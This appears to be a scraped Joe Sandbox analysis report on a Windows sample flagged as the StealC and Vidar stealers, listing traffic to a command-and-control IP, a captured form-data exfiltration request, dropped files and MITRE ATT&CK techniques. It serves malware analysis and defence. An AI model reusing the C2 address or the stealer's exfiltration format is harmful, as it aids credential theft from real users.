4a 4a 4a 4a 4a 4a 45 47 44 41 2d 2d 0d 0a Data Ascii: ------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EBAKFIIJJKJJJJJJEGDA--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFCBFIJEHDHCBGDGDGCB

C:\ProgramData\AKEGDHJDHDAFHJJKJEHC

C:\ProgramData\AKKKFBGDHJKFHJJJJDGC

C:\ProgramData\BFCFBKKKFHCFHJKFIIEHDBGCBK

C:\ProgramData\CAKKKFBFIDGDBFHJJEHIDHDAAF

C:\ProgramData\DAECAECFCAAEBFHIEHDGHDHCBA

C:\ProgramData\EGDGIEGH

C:\ProgramData\IDAAFBGD

C:\ProgramData\JKFCBAEHCAEGDHJKFHJKFIJKJE

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 00779860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 007645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0076BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6CB935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00774910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00779C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00767710 Relevance: 96.8, APIs: 54, Strings: 1, Instructions: 584
stringmemoryCOMMON

Function 00770250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00765100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre